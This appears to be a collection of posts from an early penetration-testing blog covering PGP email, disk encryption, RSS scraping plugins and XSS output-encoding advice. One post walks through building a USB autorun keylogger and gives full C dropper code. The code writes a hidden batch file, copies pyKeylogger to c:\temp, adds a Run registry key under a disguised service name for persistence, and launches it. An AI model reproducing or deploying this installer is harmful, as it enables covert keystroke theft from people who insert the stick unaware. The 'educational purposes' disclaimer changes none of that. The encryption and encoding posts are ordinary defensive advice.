Penetration testing blog

I already talked a bit about encryption software you can use to store files safely in your computer, but what about transferring sensitive information? what about sending sensitive information through e-mail?

For encrypted e-mail to work properly, we need software and/or practices on both ends. This means that if you want your communication with your clients encrypted, then you need to get your clients to do something - which is not an easy thing to do. Actually you just convinced your clients to pay attention to you and you even sold them a product/service, now you need to use your m4d jedI skills to get them to encrypt their communication - good luck on that.

Truth is that most of them will pay attention, they are already putting money in the table for you, they somehow trust that you will perform as expected or even far beyond their expectations; then why in the hell wouldn’t they say ‘yes’ to encrypted communications?

And so it begins. What are your options? What’s out there for you?

I personally use PGP (http://en.wikipedia.org/wiki/Pretty_Good_Privacy) but in its GNU version (http://www.gnupg.org/), where I represent myself using my Public Key (visible to anyone I want to share it with) and using my Public Key then clients can encrypt sensitive information and send it over. I then have something very private, called a Private Key - which I need to use in order to decrypt any information that was encrypted using my Public Key. It works the same way for both ends, therefore I need to request the public keys for anyone on the other side, and use that public key to encrypt any sensitive information before I send it over.

So what do you encrypt? If you need to send any outstanding sensitive components then you could simply use the GPG command line utility, encrypt the files and attach them encrypted to your e-mail.

But what happens when you need to send several e-mails a day, and say more, where the contents of the e-mail themselves are sensitive. Dialing information for a conference call, pricing information in the form of ballpark estimates or more? Launching a command line tool to encrypt the e-mail contents and storing those in a file, attaching the file or pasting the encrypted contents in an e-mail to then send the e-mail…sure turns into a headache.

But thanks to lots of very clever programmers and project managers, and QA…and…thanks to lots of people, there are a series of programs that you can use to Adapt PGP to your e-mail client.

The process then turns into:

- You request public keys and import them to your keys database (most of the times just 1 click away)

- You write an e-mail as usual (making sure that the Encrypt e-mail feature is enabled)

- You hit the send button.

- Any other variation that may require one additional step.

- You’re done.

 So back to discussing the alternatives around PGP/GPG - how do you integrate it with your e-mail client?

1. Enigmail (http://enigmail.mozdev.org/) - Works with Thunderbird, SeaMonkey, Mozilla and Netscape. This is the one I currently use and it kicks ass.
2. PGP Desktop (http://www.pgp.com/) - Works at least with Outlook. This is the one your valuable clients may already be using. It isn’t free - so good luck in trying to convince someone into buying a license.
3. What could the third one be? I encourage anyone to submit more options!

Tired of writing - hope you found this useful.

Thanks for reading.

If you work with sensitive information,  you need a safe place to store it. Even if the information is temporary stored in your computer and needs to be removed sometime, you need a safe way of deleting/wiping it off your drive.

These are the three most popular options at the moment:

• TrueCrypt (http://www.truecrypt.org)
• BestCrypt (http://www.jetico.com)
• PGP Disk (http://www.pgp.com/) 

My recommendation goes for TrueCrypt - which is the only one open source from above and provides a wide set of tested algorithm implementations. I did try using BestCrypt before, but it isn’t free and I experienced twice a very uncomfortable situation where the encrypted containers got corrupted and the encryption keys were no good.

The encryption algorithms provided by TrueCrypt are:

• AES
• Serpent
• Twofish

In addition, you may ‘cascade’ two or more algorithms.

TrueCrypt and BestCrypt are multiplatform - BestCrypt provides a Linux binary which I successfully tested in the past - it is packaged in the form of several utility binaries which I believe were suid and for which some security vulnerabilities were published in the past.

I currently have my e-mail profile stored in one encrypted container and any sensitive information stored in a different container -that way I don’t have the container with all the sensitive information mounted at all times.

I would avoid using the auto-mounting features - it makes little sense to have everything stored in a secured container and having it accessible at all times.

Try them out and let me know!

This is just for educational purposes only and meant for keeping this code somewhere accessible. The other night I tried to create a keyboard sniffer which would get installed and running by using the autorun feature of U3 sandisk USB sticks.

I reformatted the U3 ISO by using the incredible u3-autorun project located at:

http://sourceforge.net/projects/u3-autorun/

The tool explains that if you get the LPInstaller utility (the link for downloading it is referenced inside the project package file) to be in the same directory of the ISO file (cruzer-autorun.iso) then the tool will simply use the local iso file instead of downloading it from the sandisk web servers.

Well facts are that in my case that didn’t work - so I followed some instructions that I found online where given the fact that the LPInstaller downloads an unsigned/unencrypted ISO file from the webservers, you could simply trick the program into downloading the iso file from the webserver of your choice (i.e.: pointing u3.sandisk.com to 127.0.0.1 by modifying your win32\system32\drivers\etc\hosts file) - and that worked like a charm.

Once the new ISO file is deployed in the unwriteable partition of the USB stick, you can create an autorun.inf (can’t remember the exact filename, there’s a sample file included tho) file in the writeable partition and have the autorun program run any program of your choice.

So I grabbed the pyKeylogger from http://pykeylogger.sourceforge.net and modified the code to exclude the Donation nag window which shows up after X days of usage and is veeery easy to disable (when I should have donated to the project instead! I encourage you to do so..it’s a nice piece of software) and recompiled/packaged the whole python keylogger into a windows executable.

Very easy you could say, althought I thought that was it - when I realized that the keylogger remained inside the USB stick after being executed (and I wanted it to be persistent) I had to find a way of making the keylogger copy itself to the user’s hard drive and then finding a way of executing it off the hard-drive, not off the usb-stick.

REMEMBER: This was all done for educational purposes only and never meant to harm anyone.

So these are the two paths that I could have followed:

A) I could have modified the autorun ISO code, generate a new ISO and then replace the U3 ISO with my new one.

B) Use the autorun ISO as-it-is, as I downloaded it from sourceforge.

Unfortunately, or fortunately…? I followed (B) - I decided it wouldn’t be so damn of a workaround to find a way of making the default autorun ISO copy a file and then execute it. Unluckily for me, the autorun.inf file that is supported by the u3-autorun program only takes 1 binary filename (Which probable runs createprocess for) but takes absolutely no arguments (or the way I tried) and of course it doesn’t take batch files either.

But it was around 1, 2am and I didn’t quite find out the latter (batch files execution) until I had already created a whole batch file which took care of xcopying the contents of the ‘dist’ directory (Where the pykeylogger distribution resides inside the usb stick) to a temporary directory inside c:\temp

So once the batch file exists, I find out I can’t use a batch filename inside the autorun and I code a quick program in C. The program in C contains the code that is listed below.

The final formula was:

1. The ISO u3-autorun.inf ends up executing my-c-program.exe
2. my-c-program.exe creates a hidden batchfile in the user’s c:\windows directory
3. the batchfile creates a temporary directory inside c:\temp and copies the contents of the \dist subdirectory inside the USB stick where the keylogger distribution resides to that temporary subdirectory inside c:\temp
4. the batchfile creates a registry entry at CurrentVersion\Run calling a batchfile inside the keylogger directory, which ends up executing the keylogger using the local path.
5. the batchfile executes the keylogger
6. and my-c-program.exe after creating the batchfile executes the batchfile by calling execve and calling cmd.exe using /c batchfilename as parameters.

The reason I had to do all this mess is because:

• I wanted the keylogger to remain persistent, so it would install by inserting the usb stick and stay persistent if the usb stick was removed/the computer was restarted/etc.
• If the pykeylogger is run using a full path and not sitting in the local directory, then certain errors are thrown (and I didnt mind looking into the source for patching those problems..I should have..?)
• Once the USB stick drive is inserted and the autorun file is executed - I needed to know the full path (drive letter) of the USB stick dist subdirectory (which I worked around at 2am by creating the batch file dynamically from within the exe file, who parses argv[0] - instead of going through the msdn looking for something like GetModuleFilename() that would work)
• I can’t really remember - but it’s 2 am today again..so it’s fair.

Here’s the sample C code so it remains somewhere handy:

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

#define BATCH_PATH “c:\\windows\\win255.bat”
#define CMD_PATH “c:\\windows\\system32\\cmd.exe”

int
main(int argc, char **argv) {

FILE *myfile;
char *params[4];
char *res = 0×0;
char final[10000];
char localpath[255];

char *batch_contents = “@echo off\nmkdir c:\\temp\nmkdir c:\\temp\\win21\nxcopy /E %s\\dist c:\\temp\\win21\\\nc:\ncd c:\\temp\\win21\nreg ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v winservices /t REG_SZ /d c:\\temp\\win21\\winservices.bat\ncls\nwinservices.exe\n\0″;

 params[3] = 0×0;
 params[2] = BATCH_PATH;
 params[1] = “/c”;
 params[0] = CMD_PATH;

 myfile = fopen(BATCH_PATH, “w”);
 if (myfile == NULL) exit(-1);

 strncpy(localpath, argv[0], sizeof(localpath)-1);
 res = strtok(localpath, “\\”);
 if (res == NULL) exit(-1);

 _snprintf(final, sizeof(final)-1, batch_contents, res);
 final[sizeof(final)-1] = 0×00;
 fprintf(myfile, “%s”, final);
 fflush(myfile);
 fclose(myfile);

 execve(params[0], params, NULL);

 return 0;
}

A couple days ago I discovered these wordpress plugins which are meant to grab any syndicated content published through  RSS (either using ATOM or other means) in Blogs and after grabbing the content, the plugins republish it in your own blog.

The first tool is called feedwordpress and can be found here:

http://projects.radgeek.com/feedwordpress/

There’s a whole discussion on how this is actually stealing content - given the increase in the amount of websites on the Internet these days, the only way of telling crappy from non-crappy sites is through actual “content”, which makes “borrowing” content a critical crime

Well there’s a whole purpose behind using these tools for “good” - I know they are very common in the porn industry where simple blogs created to do nothing but earn money need daily content and through these tools they can use the RSS feeds provided by the “affiliate companies” (the ones who pay the webmasters money per sale, recursive sale, whatever) to host new content every day.

Another tool that can be used for hosting remote content is also WP-o-matic:

http://devthought.com/wp-o-matic-the-wordpress-rss-agreggator/ 

I haven’t tried that one, the site looks nice tho’

So where was I going.. oh, yeah - well there are plenty of blogs created by information security experts out there, plenty, and having a unique space where their content meets would be nice - not relying on stand alone RSS feed readers. But then again, I thought about it twice and decided to create my own posts referencing their content. That way I get to force myself into reading every single blog and getting the sweetest posts here.

Hope that makes sense.

I don’t even know this guy - never had a verbal nor written word exchanged with him. Nevertheless, his blog is interesting and could be considered a must-read for someone in the information security industry. It sure looks like he has some years experience on penetration testing and participates in OWASP related meetings/events.

He recently joined the ACE Team, one of Microsoft’s security oriented teams where a series of known names have worked at in the past and several are currently working. It looks like the ACE Team is performing some heavy head hunting.

This guy is based in the UK and looks friendly, he is even inviting anyone in the UK to join him and his Bank friends for dinner & drinks in his “London Security Supper Club” post at,

http://securitybuddha.com/2007/09/26/london-security-supper-club/

So, again, I will probably be quoting this guy a few times through any future posts, but definitely add his posts to your RSS feed. The base url of his blog is:

http://www.securitybuddha.com/

Talk to you all later.

Hey programmers, this is simply a short and small recommendation, generic and not language-dependent. Please take two minutes or less to go through this post if you are new to the world of cross site scripting and you’re in the process of learning how to code securely.
It is critical that you don’t use a single encoding function in a find and replace manner. Some websites will blindly recommend programmers to use HTML encoding functions (i.e.: Server.HtmlEncode in ASP) for encoding on output, however, HTML encoding can only do some good on specific cases. It is extremely important that you understand the context where the vulnerability is taking place in order to understand what characters you need to encode and the way the characters need to be encoded.

For example, HTML encoding will usually just encode a small set of 4 characters being < > &amp; ” into their HTML entities (&lt; &gt; &amp; “) and using it on the following example will do absolutely nothing to fix the issue that exists in this PHP line:

&lt;input value=’&lt;?=dynamic_dangerous_variable?&gt;’ type=”text” id=name&gt;

If you are wondering why, then look at the characters that are enclosing the contents of the value attribute and refer back to the 4 characters the HTML encoding function encoded. Right, the function does not take care of encoding single quotes, therefore the issue still exists. An attacker could easily use single quotes to escape from the value attribute and either continue writing attributes for the input tag (such as onclick, onmouseover, …) or, if the encoding function allows it (which is not the case here) close the input tag and continue writing the malicious payload.

Strong encoding libraries such as Reform, the multi-language encoding library originally developed by Michael Eddington and now adopted by the OWASP project provide several sets of encoding functions to be used in different contexts.

The Reform library is available at the OWASP encoding project (http://www.owasp.org/index.php/Category:OWASP_Encoding_Project)

Another thing to have in mind is NOT to opt for generic filtering layers instead. Take some more time and perform encoding wherever needed, that is the right thing to do. Filtering layers could turn out strong but strong filtering layers mean several headaches. Why? If you look around, you will find that Cross site scripting attacks have evolved incredibly ever since and so have the techniques used to disguise Cross site scripting attacks.

A full listing of the different techniques used to disguise XSS attacks can be found at the Cross Site Scripting Cheat Sheet available at http://ha.ckers.org/xss.html (it  goes offline every now and then, so be patient).

Hence if what you want to do is ‘filter all malicious characters’ you will end up filtering a really wide set of characters that you will most likely need for your application to run.

Should I have time and the will, you will soon find another post with regards to different techniques that exist in order to bypass filtering layers. You may want to test them on your own layers and see what happens

Finally, you may want to consider avoiding any encoding on situations where the dynamic data being displayed to the browser is a URL. It is usually very easy to break functionality (break the url for instance) and that is something you definitely do not want to happen. You might fix the XSS issue but you will end up having a problem in QA. Therefore you can either validate the Url using a regex or if the dynamic portion of the Url is the querystring, encoding the querystring values using some kind of a UrlEncode method.

.-

Cross site scripting issues are everywhere - I’ll try to provide as many resources as possible for programmers in different programming languages and show them how to take the basic steps in the way of protection.

Remember the basics: Always perform encoding at the time of displaying dynamic data to browsers. If you browse around the blog you should find more information on XSS and how to educate yourself as a programmer or individual (well programmers are individuals too, yeah.)

If your programming language is Java, then you should take a look at the StringEscapeUtils java class which belongs to the Apache commons namespace. It provides a nice set of encoding methods/functions that you need to have handy at the time of programming web based interfaces.

The Url for such class can be found here:

http://jakarta.apache.org/commons/lang/api/org/apache/commons/lang/StringEscapeUtils.html

In addition to providing encoding methods, the StringEscapeUtils class also provides decoding functionality - both encoding and decoding available in their Html, Javascript, Java, Xml and SQL versions (this last one not meant for XSS, but worth mentioning.)

Here’s a table of the different methods and references:

I will also cover in future posts any other encoding libraries available out there. For the moment, a nice alternative could be Michael Eddington’s encoding library named ‘Reform’ and which has recently (?) been adopted by the OWASP Encoding project. The library and the project can be found at:

http://www.owasp.org/index.php/Category:OWASP_Encoding_Project

Hope that’s enough information for now.

This post is meant for any Perl programmers out there, in order to give them a hint at the time of developing code which is meant to be safe (can’t guarantee!) from Cross site scripting problems.  The main message, as always, is make sure that you are encoding your data before it gets displayed to browsers, especially when this information comes from untrusted containers (i.e.: user input, databases, etc.) You can either go for HTML-Encoding or URL-encoding, or even any home-grown methods of your choice, depending on the  context behind what’s being encoded and where it is being placed.

www-perl 

An alternative using www-perl would be:

use CGI::Escape;
print “Information”, HTML::Entities::encode($text);
print “It is located in (URL)”, HTML::Entities::encode($text);

Apache utils

A different alternative now using Apache utils can be:

use Apache::Util;
…
…
$e->print(Apache::Util::escape_html($myText), ”
“);
$e->print(”<a href=”/”>link</a>”);

I will keep working on this information in future posts - this is just a first step forward.

Hello world! Welcome to the experimental penetration testing blog at penetrationtests.com. Let’s hope for quality content and a good future.

Cheers.